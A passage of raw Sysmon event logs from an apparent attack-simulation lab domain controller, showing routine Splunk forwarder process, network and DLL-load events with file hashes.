Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:46.881{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.882{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000099231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:43.136{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53332-false10.0.1.12-8000- 23542300x800000000000000099230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.318{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5E1E827FF5B9946B963A3B1410118CE,SHA256=C88697A912F309B191FBF790BE8952D18313F197D5B3B3C6226F26D7650A65C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
734700x800000000000000099229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.053{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000099228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.053{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.053{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.631{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000099337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.631{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.631{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.490{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 
734700x800000000000000099331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000099327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x800000000000000099326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 
734700x800000000000000099321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000099319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 
734700x800000000000000099314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7trueMicrosoft WindowsValid 734700x800000000000000099309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 
734700x800000000000000099307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECCtrueMicrosoft WindowsValid 734700x800000000000000099304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client 